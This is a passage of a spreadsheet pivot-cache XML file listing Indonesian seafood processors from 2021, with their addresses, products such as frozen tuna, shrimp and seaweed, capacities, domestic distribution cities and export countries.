    <s v="Jl, Tukad Yeh Aya No,38, Kel, Panjer, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Hidup"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Tangerang"/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25211"/>
    <x v="927"/>
    <s v="PT. UTAMAKAN KEMAKMURAN RAKYAT"/>
    <s v="Dusun Sentosa, Kel. Lekopancing, Kec. Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Segar"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="500"/>
    <s v="Kota Makassar"/>
    <s v="Australia, China, Hong Kong, Macao, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25214"/>
    <x v="1141"/>
    <s v="PT. JAYA UTAMA QUALITY"/>
    <s v="Jl. Sultan Abdullah Raya, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Teripang Kering"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25215"/>
    <x v="1142"/>
    <s v="CV. FIVA FOOD &amp; MEAT SUPPLY"/>
    <s v="Jl. Al Ikhsan, Kp Kemang No.104, Kel. Jatibening Baru, Kec. Pondok Gede, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Kaki Naga, Pangsit Ikan)"/>
    <d v="2021-06-23T00:00:00"/>
    <n v="14500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Surabaya"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="25216"/>
    <x v="1143"/>
    <s v="PT. FISHINDO LINTAS SAMUDRA"/>
    <s v="Jl. Raya Margomulyo No.44, Suri Mulia Permai Blok NN No.01, Kel. Greges, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Barramundi)"/>
    <d v="2021-06-18T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25217"/>
    <x v="1143"/>
    <s v="PT. FISHINDO LINTAS SAMUDRA"/>
    <s v="Jl. Raya Margomulyo No.44, Suri Mulia Permai Blok NN No.01, Kel. Greges, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2021-06-18T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang"/>
    <m/>
  </r>
  <r>
    <n v="25218"/>
    <x v="1143"/>
    <s v="PT. FISHINDO LINTAS SAMUDRA"/>
    <s v="Jl. Raya Margomulyo No.44, Suri Mulia Permai Blok NN No.01, Kel. Greges, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Tongkol, Salem, Layang, Cakalang)"/>
    <d v="2021-06-18T00:00:00"/>
    <n v="3300000"/>
    <s v="Kabupaten Semarang, Kota Semarang, Kabupaten Trenggalek, Kabupaten Banyuwangi, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25219"/>
    <x v="1144"/>
    <s v="PT. SEA SIX ENERGY INDONESIA"/>
    <s v="Jl. Ketut Sanggra No.66, Kel. Patas, Kec. Gerokgak, Kabupaten Buleleng&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Butiran Rumput Laut Kering"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="India"/>
  </r>
  <r>
    <n v="25220"/>
    <x v="1144"/>
    <s v="PT. SEA SIX ENERGY INDONESIA"/>
    <s v="Jl. Ketut Sanggra No.66, Kel. Patas, Kec. Gerokgak, Kabupaten Buleleng&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ekstrak Rumput Laut"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="India"/>
  </r>
  <r>
    <n v="25221"/>
    <x v="1145"/>
    <s v="PT. REZEKI SAMUDRA ABADI"/>
    <s v="Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25222"/>
    <x v="1145"/>
    <s v="PT. REZEKI SAMUDRA ABADI"/>
    <s v="Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Kembung, Makerel, Lemadang, Marlin, Gindara, Tenggiri, Pedang)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25223"/>
    <x v="1145"/>
    <s v="PT. REZEKI SAMUDRA ABADI"/>
    <s v="Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Kaci-kaci, Barramundi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25224"/>
    <x v="1145"/>
    <s v="PT. REZEKI SAMUDRA ABADI"/>
    <s v="Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, China, Japan, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25225"/>
    <x v="1145"/>
    <s v="PT. REZEKI SAMUDRA ABADI"/>
    <s v="Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Udang Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25226"/>
    <x v="1145"/>
    <s v="PT. REZEKI SAMUDRA ABADI"/>
    <s v="Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25227"/>
    <x v="1145"/>
    <s v="PT. REZEKI SAMUDRA ABADI"/>
    <s v="Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Seafood Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Naget Udang, Kaki Naga, Keong Mas, Siomay Ikan, Ekkado, Otak-otak Ikan, Roll Ikan)"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="25228"/>
    <x v="1146"/>
    <s v="PT. SEBATIK JAYA MANDIRI"/>
    <s v="Jl. PPI RT 06 RW 02, Kel. Mansapa, Kec. Nunukan Selatan, Kabupaten Nunukan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-07-02T00:00:00"/>
    <n v="6164000"/>
    <s v="Kota Surabaya, Kota Makassar"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="25229"/>
    <x v="746"/>
    <s v="PT. KELOLA MINA LAUT UNIT LOBUK"/>
    <s v="Desa Lobuk, Kel. Lobuk, Kec. Bluto, Kabupaten Sumenep&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kering"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Gresik"/>
    <s v="Japan, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25230"/>
    <x v="927"/>
    <s v="PT. UTAMAKAN KEMAKMURAN RAKYAT"/>
    <s v="Dusun Sentosa, Kel. Lekopancing, Kec. Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Makassar"/>
    <s v="Australia, China, Hong Kong, Macao, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="25234"/>
    <x v="1147"/>
    <s v="UD. PEMPEK UMI ABI"/>
    <s v="Jl. AKBP. H. Umar No.598 RT 022 RW 001, Kel. Ario Kemuning, Kec. Kemuning, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Pempek Ikan, Siomay Ikan, Tekwan Ikan, Dimsun Ikan)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="30"/>
    <s v="Kota Palembang, Kota Jakarta Pusat"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="25235"/>
    <x v="1148"/>
    <s v="UD. KLA SORONG"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Teri, Baby Tuna, Deho, Kembung, Cakalang, Tenggiri)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="25236"/>
    <x v="1148"/>
    <s v="UD. KLA SORONG"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Kurisi)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="25237"/>
    <x v="1148"/>
    <s v="UD. KLA SORONG"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Makassar"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="25238"/>
    <x v="1148"/>
    <s v="UD. KLA SORONG"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="25239"/>
    <x v="1148"/>
    <s v="UD. KLA SORONG"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="25241"/>
    <x v="1149"/>
    <s v="PT. SUMBER KALIMANTAN ABADI"/>
    <s v="Jl. Mulawarman No.99, Kel. Manggar, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="750000"/>
    <m/>
    <s v="Hong Kong, Japan, United Kingdom, United States"/>
  </r>
  <r>
    <n v="25242"/>
    <x v="1149"/>
    <s v="PT. SUMBER KALIMANTAN ABADI"/>
    <s v="Jl. Mulawarman No.99, Kel. Manggar, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="130000"/>
    <m/>
    <s v="Hong Kong, Japan, United Kingdom, United States"/>
  </r>
  <r>
    <n v="25248"/>
    <x v="1150"/>
    <s v="PT. MAJU BERSAMA KARIB"/>
    <s v="Jl. Cemara No.59, Kel. Bugul Lor, Kec. Panggungrejo, Kota Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25250"/>
    <x v="1151"/>
    <s v="SUDIRMAN"/>
    <s v="Gg. Murni Barek Motor RT 001 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kerisi, Jahan, Jebung, Sebelah)"/>
    <d v="2021-05-20T00:00:00"/>
    <n v="29500"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25251"/>
    <x v="1151"/>
    <s v="SUDIRMAN"/>
    <s v="Gg. Murni Barek Motor RT 001 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Alu-alu, Talang-talang, Tenggiri)"/>
    <d v="2021-05-20T00:00:00"/>
    <n v="24300"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="25252"/>
    <x v="232"/>
    <s v="PT. MARINA MAKMUR SEJAHTERA"/>
    <s v="Jl. Raya Salembaran Komplek Pergudangan Royal Kosambi Blok D6 (Room 2), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="25253"/>
    <x v="1152"/>
    <s v="PT. MARINA LAUTAN SEJAHTERA FISHERY"/>
    <s v="Jl. Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="25254"/>
    <x v="1152"/>
    <s v="PT. MARINA LAUTAN SEJAHTERA FISHERY"/>
    <s v="Jl. Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Kawabida, Salem)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Thailand"/>
  </r>
  <r>
    <n v="25255"/>
    <x v="1152"/>
    <s v="PT. MARINA LAUTAN SEJAHTERA FISHERY"/>
    <s v="Jl. Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kakap, Kerapu)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25256"/>
    <x v="1152"/>
    <s v="PT. MARINA LAUTAN SEJAHTERA FISHERY"/>
    <s v="Jl. Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="25257"/>
    <x v="1153"/>
    <s v="UD, GARINDO"/>
    <s v="Jl, Sutomo Baru No,88, Kel, Pandau Hilir, Kec, Medan Perjuangan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="25258"/>
    <x v="1154"/>
    <s v="PT. SUMBER LAUT ALAM"/>
    <s v="Jl. Patimura Telaga Punggur No.55 RT 001 RW 001, Kel. Kabil, Kec. Nongsa , Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="80"/>
    <s v="Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="25259"/>
    <x v="1154"/>
    <s v="PT. SUMBER LAUT ALAM"/>
    <s v="Jl. Patimura Telaga Punggur No.55 RT 001 RW 001, Kel. Kabil, Kec. Nongsa , Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Selar, Cakalang, Benggol)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="280"/>
    <s v="Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="25260"/>
    <x v="1154"/>
    <s v="PT. SUMBER LAUT ALAM"/>
    <s v="Jl. Patimura Telaga Punggur No.55 RT 001 RW 001, Kel. Kabil, Kec. Nongsa , Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Pisang-pisang, Anggoli, Kerapu, Bawal, Ekor Kuning)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="105"/>
    <s v="Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="25265"/>
    <x v="1155"/>
    <s v="UD. SEAWEED SUKSES SEJAHTERA"/>
    <s v="Kompleks Parangloe Indah Blok E3 No.10, Kel. Parangloe, Kec. Tamanlarea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Chile"/>
  </r>
  <r>
    <n v="25266"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan, Spain, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="25267"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="Japan, Spain, Viet Nam"/>
  </r>
  <r>
    <n v="25268"/>
    <x v="528"/>
    <s v="UD. ANTAMAIQ"/>
    <s v="Jl. Arwana 1 BTN Taman Mutiara, Kel. Pagutan Barat, Kec. Mataram, Kota Mataram&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Sari Ikan Gabus Beku"/>
    <d v="2021-06-28T00:00:00"/>
    <n v="192"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Sumbawa, Kabupaten Dompu, Kabupaten Bima, Kabupaten Sumbawa Barat, Kota Mataram, Kota Bima, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="25277"/>
    <x v="1156"/>
    <s v="UD. TRIFAKU MANDIRI"/>
    <s v="Jl. Raya Wonosari, Kel. Wonosari, Kec. Gading Rejo, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Dimsum Ikan, Dimsum Udang, Siomay Ikan) "/>
    <d v="2021-05-21T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Pringsewu, Kota Bandar Lampung, Kota Jakarta Selatan"/>
    <m/>
  </r>
  <r>
    <n v="25278"/>
    <x v="1156"/>
    <s v="UD. TRIFAKU MANDIRI"/>
    <s v="Jl. Raya Wonosari, Kel. Wonosari, Kec. Gading Rejo, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="1200"/>
    <s v="Kabupaten Pesawaran, Kabupaten Pringsewu, Kota Bandar Lampung"/>
    <m/>
  </r>
  <r>
    <n v="25279"/>
    <x v="1156"/>
    <s v="UD. TRIFAKU MANDIRI"/>
    <s v="Jl. Raya Wonosari, Kel. Wonosari, Kec. Gading Rejo, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Pempek Ikan"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Pesawaran, Kabupaten Pringsewu, Kota Bandar Lampung, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="25281"/>
    <x v="1156"/>
    <s v="UD. TRIFAKU MANDIRI"/>
    <s v="Jl. Raya Wonosari, Kel. Wonosari, Kec. Gading Rejo, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Stik Lele"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="1200"/>
    <s v="Kabupaten Pesawaran, Kabupaten Pringsewu, Kota Bandar Lampung"/>
    <m/>
  </r>
  <r>
    <n v="25282"/>
    <x v="1157"/>
    <s v="CV. JALADRI FOOD"/>
    <s v="Dusun Kedungaron RT 05 RW 02, Kel. Gajahbendo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Siomay Ikan, Kaki Naga Ikan, Tempura Udang, Tempura Ikan)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Selatan, Kabupaten Cirebon, Kabupaten Bekasi, Kabupaten Cilacap, Kabupaten Semarang, Kota Yogyakarta, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="25283"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25284"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25285"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Rajungan Rebus Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25286"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Masak Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25287"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25288"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25289"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25290"/>
    <x v="1158"/>
    <s v="PT. TOBA SURIMI INDUSTRIES PLANT I"/>
    <s v="Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Campuran Seafood Beku"/>
    <d v="2021-05-07T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="25295"/>
    <x v="1157"/>
    <s v="CV. JALADRI FOOD"/>
    <s v="Dusun Kedungaron RT 05 RW 02, Kel. Gajahbendo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bekasi, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="25296"/>
